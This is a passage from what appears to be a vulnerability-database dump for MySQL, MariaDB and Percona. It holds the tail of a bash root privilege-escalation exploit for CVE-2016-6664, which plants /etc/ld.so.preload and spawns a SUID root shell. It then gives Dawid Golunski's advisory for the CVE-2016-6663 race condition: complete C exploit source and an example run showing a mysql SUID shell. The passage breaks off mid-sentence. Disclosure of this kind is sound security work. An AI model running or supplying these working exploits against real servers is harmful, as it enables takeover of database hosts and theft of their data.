Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92513"}, {"lastseen": "2017-11-19T12:07:28", "description": "- Release date: 01.11.2016\r\n- Discovered by: Dawid Golunski\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nMySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition\r\n\r\n\r\nMariaDB \r\n\t< 5.5.52\r\n\t< 10.1.18\r\n < 10.0.28\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\r\nMySQL:\r\n\r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n\r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n\r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n\r\n--\r\n\r\nMariaDB:\r\n\r\n\"MariaDB is one of the most popular database servers in the world. \r\nIt\u00e2\u20ac\u2122s made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n\r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n\r\nhttps://mariadb.org/about/\r\n\r\n--\r\n\r\nPerconaDB:\r\n\r\n\"Percona Server for MySQL\u00c2\u00ae is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. \r\nWith over 3,000,000 downloads, Percona Server\u00e2\u20ac\u2122s self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n\r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nAn independent research has revealed a race condition vulnerability which is \r\npresent in MySQl, MariaDB and PerconaDB databases. \r\n\r\nThe vulnerability can allow a local system user with access to the affected \r\ndatabase in the context of a low-privileged account (CREATE/INSERT/SELECT grants) \r\nto escalate their privileges and execute arbitrary code as the database system \r\nuser (typically 'mysql'). \r\n\r\nSuccessful exploitation would allow an attacker to gain access to all of the \r\ndatabases stored on the affected database server.\r\n\r\nThe obtained level of access upon the exploitation, could be chained with\r\nthe other privilege escalation vulnerabilities discovered by the author of\r\nthis advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges \r\nfrom mysql user to root user and thus allow attackers to fully compromise the \r\ntarget server.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\n\r\nTable locations\r\n~~~~~~~~~~~~~~~~~~\r\n\r\nMySQL-based databases allow users with CREATE table privilege to optionally\r\nspecify a disk path of the directory where the table will be stored via a DATA \r\nDIRECTORY parameter in the CREATE statement.\r\n\r\nUsers who have access to a database account with CREATE grant could create a \r\ntable under a directory that they can control. For example:\r\n\r\nattacker@debian:~$ mkdir /tmp/disktable\r\nattacker@debian:~$ chmod 777 /tmp/disktable/\r\nattacker@debian:~$ ls -ld /tmp/disktable/\r\ndrwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/\r\n\r\nA user could then place a table within the directory with the following SQL \r\nstatement:\r\n\r\nmysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';\r\n\r\nwhich would result in creating the following table file:\r\n\r\nattacker@debian:~$ ls -l /tmp/disktable/\r\ntotal 0\r\n-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD\r\n\r\n\r\nRace Condition\r\n~~~~~~~~~~~~~~~~~~\r\n\r\nObserving file operations performed on the table stored within the directory, \r\nit was discovered that REPAIR TABLE SQL statement which is available to \r\nlow-privileged users with SELECT/CREATE/INSERT grants, performed unsafe \r\noperations on temporary files created during the table repair process.\r\n\r\nExecuting the statement:\r\n```\r\nmysql> REPAIR TABLE `poctab1`;\r\n+----------------+--------+----------+----------+\r\n| Table | Op | Msg_type | Msg_text |\r\n+----------------+--------+----------+----------+\r\n| testdb.poctab1 | repair | status | OK |\r\n+----------------+--------+----------+----------+\r\n\r\nwould result in execution of the following system calls:\r\n\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] open(\"/tmp/disktable/poctab1.MYD\", O_RDWR) = 65\r\n[pid 1463] access(\"./testdb/poctab1.TRG\", F_OK) = -1 ENOENT (No such file or directory)\r\n[pid 1463] lseek(65, 0, SEEK_CUR) = 0\r\n[pid 1463] lseek(65, 0, SEEK_END) = 0\r\n[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0\r\n[pid 1463] open(\"/tmp/disktable/poctab1.TMD\", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66\r\n[pid 1463] lseek(65, 0, SEEK_END) = 0\r\n[pid 1463] lseek(64, 0, SEEK_END) = 1024\r\n[pid 1463] close(65) = 0\r\n[pid 1463] close(66) = 0\r\n[pid 1463] lstat(\"/tmp\", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0\r\n[pid 1463] lstat(\"/tmp/disktable\", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] stat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0\r\n[pid 1463] chown(\"/tmp/disktable/poctab1.TMD\", 110, 115) = 0\r\n[pid 1463] unlink(\"/tmp/disktable/poctab1.MYD\") = 0\r\n[pid 1463] rename(\"/tmp/disktable/poctab1.TMD\", \"/tmp/disktable/poctab1.MYD\") = 0\r\n\r\n```\r\nThe first call:\r\n```\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n```\r\nwas found to check file permissions of poctab1.MYD table which are then copied with chmod()\r\nto the newly created poctab1.TMD temporary file containing the repaired table.\r\n\r\nThe code is vulnerable to Race Condition between the call:\r\n```\r\n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0\r\n```\r\nand\r\n```\r\n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0\r\n```\r\n\r\nIf an attacker managed to unlink the temporary table poctab1.TMD and replace it\r\nwith a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), \r\nthey would be able to apply arbitrary permissions on the data directory. \r\nThe attacker would be able to control the set of permissions by pre-setting them on\r\npoctab1.MYD file before executing the REPAIR TABLE statement.\r\nFor example, by setting the permissions of poctab1.MYD to 777 the data directory\r\nwould become readable and writable to the attacker.\r\n\r\n\r\nObtaining mysql-suid shell\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApart from gaining access to arbitrary mysql files, the attacker could also \r\nachieve arbitrary code execution in the context of mysql user (mysql shell).\r\n\r\nThis could be done by first pre-setting permissions on poctab1.MYD to 04777 \r\n(suid), and winning the race so that the permissions get applied on a copy\r\nof a bash shell file through the vulnerable chmod() call effectively creating\r\na shell that elevates their permissions after execution.\r\n\r\nThere is only one problem. Their suid shell would remain to be owned by the \r\nattacker's user id and not 'mysql' user. \r\n\r\nTo elevate their privileges, attacker would need to copy the bash shell to a \r\nmysql-owned table file which are owned by mysql user. However mysql table \r\nfiles are not writable by other users making it impossible for attacker to save \r\nthe shell.\r\n\r\nThis could be bypassed if attacker created a specially crafted directory \r\nwith a group sticky bit and then created a second table named 'poctab2' as\r\nfollows:\r\n\r\nattacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/\r\nattacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/\r\ndrwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/\r\n\r\nmysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';\r\nQuery OK, 0 rows affected (0.00 sec)\r\n\r\nattacker@debian:/tmp/disktable$ ls -l /tmp/disktable/\r\ntotal 0\r\n-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD\r\n-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD\r\n\r\nAs we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions\r\nof the group on disktable directory) has 'mysql' as the owner but 'attacker' \r\nas the group. \r\nTherefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file \r\nand preserve the file owner.\r\n\r\nFinally, they could exploit the Race Condition again and have SUID + exec \r\npermissions applied on poctab2.MYD which would then allow them to execute the suid \r\nshell with elevated privileges of the mysql user.\r\n\r\n\r\nFrom mysql to root\r\n~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nAfter obtaining a mysql suid shell, attackers could then exploit one of the \r\nother MySQL vulnerabilities discovered by the author of this advisory:\r\n\r\nCVE-2016-6662 \r\nor\r\nCVE-2016-6664 (Oracle CVE-2016-5617)\r\n\r\nto escalate their privileges from mysql user to root system user.\r\n\r\n\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n\r\n------------------[ mysql-privesc-race.c ]--------------------\r\n```\r\n/*\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski\r\n\r\ndawid[at]legalhackers.com\r\n@dawid_golunski\r\nhttp://legalhackers.com\r\n\r\n\r\nCompile:\r\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\r\n\r\nNote:\r\n* On RedHat-based systems you might need to change /tmp to another public directory\r\n\r\n* For testing purposes only. Do no harm. \r\n\r\nFull advisory URL:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\n\r\n*/\r\n\r\n\r\n#include <fcntl.h>\r\n#include <grp.h>\r\n#include <mysql.h>\r\n#include <pwd.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n\r\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\r\n#define EXP_DIRN \"mysql_privesc_exploit\"\r\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\r\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\r\n\r\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\r\n\r\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\r\n\r\nMYSQL *conn;\t\t // DB handles\r\nMYSQL_RES *res;\r\nMYSQL_ROW row;\r\n\r\nunsigned long cnt;\r\n\r\n\r\nvoid intro() {\r\n\r\nprintf( \r\n \"\\033[94m\\n\"\r\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\r\n \"mysql-privesc-race.c (ver. 1.0)\\n\\n\"\r\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\r\n \"For testing purposes only. Do no harm.\\n\\n\"\r\n\t\"Discovered/Coded by:\\n\\n\"\r\n\t\"Dawid Golunski \\n\"\r\n\t\"http://legalhackers.com\"\r\n \"\\033[0m\\n\\n\");\r\n\r\n}\r\n\r\nvoid usage(char *argv0) {\r\n intro();\r\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\r\n}\r\n\r\nvoid mysql_cmd(char *sql_cmd, int silent) {\r\n \r\n if (!silent) {\r\n\t printf(\"%s \\n\", sql_cmd);\r\n }\r\n if (mysql_query(conn, sql_cmd)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n res = mysql_store_result(conn);\r\n if (res>0) mysql_free_result(res);\r\n\r\n}\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\n int randomnum = 0;\r\n int io_notified = 0;\r\n int myd_handle;\r\n int wpid;\r\n int is_shell_suid=0;\r\n pid_t pid;\r\n int status;\r\n struct stat st;\r\n /* io notify */\r\n int fd;\r\n int ret;\r\n char buf[4096] __attribute__((aligned(8)));\r\n int num_read;\r\n struct inotify_event *event;\r\n /* credentials */\r\n char *user = argv[1];\r\n char *password = argv[2];\r\n char *db_host = argv[3];\r\n char *database = argv[4];\r\n\r\n\r\n // Disable buffering of stdout\r\n setvbuf(stdout, NULL, _IONBF, 0);\r\n\r\n // Get the params\r\n if (argc!=5) {\r\n\tusage(argv[0]);\r\n\texit(1);\r\n } \r\n intro();\r\n // Show initial privileges\r\n printf(\"\\n[+] Starting the exploit as: \\n\");\r\n system(\"id\");\r\n\r\n // Connect to the database server with provided credentials\r\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\r\n conn = mysql_init(NULL);\r\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\r\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\r\n exit(1);\r\n }\r\n\r\n // Prepare tmp dir\r\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\r\n umask(000);\r\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\r\n system(\"chmod g+s /tmp/\" EXP_DIRN );\r\n\r\n // Prepare exploit tables :)\r\n printf(\"\\n[+] Creating mysql tables \\n\\n\");\r\n mysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0);\r\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\r\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\r\n\r\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\r\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\r\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\r\n system(\"cp /bin/bash \" SUID_SHELL);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n // Use inotify to get the timing right\r\n fd = inotify_init();\r\n if (fd < 0) {\r\n printf(\"failed to inotify_init\\n\");\r\n return -1;\r\n }\r\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\r\n\r\n\r\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\r\n\r\n printf(\"\\n[+] Entering the race loop... Hang in there...\\n\");\r\n\r\n while ( is_shell_suid != 1 ) {\r\n\r\n cnt++;\r\n\tif ( (cnt % 100) == 0 ) {\r\n\t \tprintf(\"->\");\r\n\t \t//fflush(stdout);\t\r\n\t}\r\n\r\n /* Create empty file , remove if already exists */\r\n unlink(MYSQL_TEMP_FILE);\r\n unlink(MYSQL_TAB_FILE);\r\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\r\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\r\n\r\n\t/* random num if needed */\r\n srand ( time(NULL) );\r\n randomnum = ( rand() % MAX_DELAY );\r\n\r\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\r\n pid = fork();\r\n if (pid < 0) {\r\n fprintf(stderr, \"Fork failed :(\\n\");\r\n }\r\n\r\n /* Child process - executes REPAIR TABLE SQL statement */\r\n if (pid == 0) {\r\n usleep(500);\r\n unlink(MYSQL_TEMP_FILE);\r\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\r\n // child stops here\r\n exit(0);\r\n }\r\n\r\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\r\n if (pid > 0 ) {\r\n io_notified = 0;\r\n\r\n while (1) {\r\n int processed = 0;\r\n ret = read(fd, buf, sizeof(buf));\r\n if (ret < 0) {\r\n break;\r\n }\r\n while (processed < ret) {\r\n event = (struct inotify_event *)(buf + processed);\r\n if (event->mask & IN_CLOSE) {\r\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\r\n //usleep(randomnum);\r\n\r\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \r\n\t\t\t unlink(MYSQL_TAB_FILE);\r\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\r\n\t\t\t close(myd_handle);\r\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\r\n\r\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\r\n unlink(MYSQL_TEMP_FILE);\r\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\r\n io_notified=1;\r\n }\r\n }\r\n processed += sizeof(struct inotify_event);\r\n }\r\n if (io_notified) {\r\n break;\r\n }\r\n }\r\n\r\n\r\n waitpid(pid, &status, 0);\r\n }\r\n\r\n\t// Check if SUID bit was set at the end of this attempt\r\n if ( lstat(SUID_SHELL, &st) == 0 ) {\r\n\t if (st.st_mode & S_ISUID) {\r\n\t\tis_shell_suid = 1;\r\n\t }\r\n } \r\n\r\n }\r\n\r\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\r\n system(\"ls -l \" SUID_SHELL);\r\n\r\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\r\n system(SUID_SHELL \" -p -i \");\r\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\r\n\r\n /* close MySQL connection and exit */\r\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\r\n mysql_close(conn);\r\n return 0;\r\n\r\n}\r\n\r\n```\r\n\r\n\r\n\r\n\r\nExample run:\r\n~~~~~~~~~~~~~~\r\n```\r\nattacker@xenial:~/mysql-exploit$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID:\tUbuntu\r\nDescription:\tUbuntu 16.04.1 LTS\r\nRelease:\t16.04\r\nCodename:\txenial\r\n\r\nattacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv\r\nii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version)\r\nii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries\r\nii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files\r\n\r\nattacker@xenial:~/mysql-exploit$ id\r\nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker)\r\n\r\nattacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n| Grants for attacker@localhost |\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |\r\n| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' |\r\n+-----------------------------------------------------------------------------------------------------------------+\r\n\r\nattacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*\r\nls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied\r\n\r\nattacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb\r\n\r\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\r\nmysql-privesc-race.c (ver. 1.0)\r\n\r\nCVE-2016-6663 / OCVE-2016-5616\r\n\r\nFor testing purposes only. Do no harm.\r\n\r\nDiscovered/Coded by:\r\n\r\nDawid Golunski \r\nhttp://legalhackers.com\r\n\r\n\r\n[+] Starting the exploit as: \r\nuid=1001(attacker) gid=1001(attacker) groups=1001(attacker)\r\n\r\n[+] Connecting to the database `pocdb` as attacker@localhost\r\n\r\n[+] Creating exploit temp directory /tmp/mysql_privesc_exploit\r\n\r\n[+] Creating mysql tables \r\n\r\nDROP TABLE IF EXISTS exploit_table \r\nDROP TABLE IF EXISTS mysql_suid_shell \r\nCREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \r\nCREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' \r\n\r\n[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : \r\n-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD\r\n\r\n[+] Entering the race loop... Hang in there...\r\n\r\n\r\n[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: \r\n\r\n-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD\r\n\r\n[+] Spawning the mysql SUID shell now... \r\n Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)\r\n\r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\nmysql_suid_shell.MYD-4.3$ id\r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\nmysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*\r\n-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm\r\n-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD\r\n-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI\r\nmysql_suid_shell.MYD-4.3$ exit\r\nexit\r\n\r\n[+] Job done. Exiting\r\n\r\n\r\nreal\t0m28.999s\r\nuser\t0m0.016s\r\nsys\t0m0.016s\r\n\r\n```\r\n\r\n\r\nVideo PoC:\r\n~~~~~~~~~~~~\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nMalicious local users with DB access granted a common set of privileges \r\n(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary \r\ncode and escalate their privileges to mysql system user. This would allow them \r\nto gain access to all of the databases stored on the server as well as exploit \r\nCVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges\r\nto root system user (rootshell) and fully compromise the target server.\r\n\r\nThis vulnerability could for 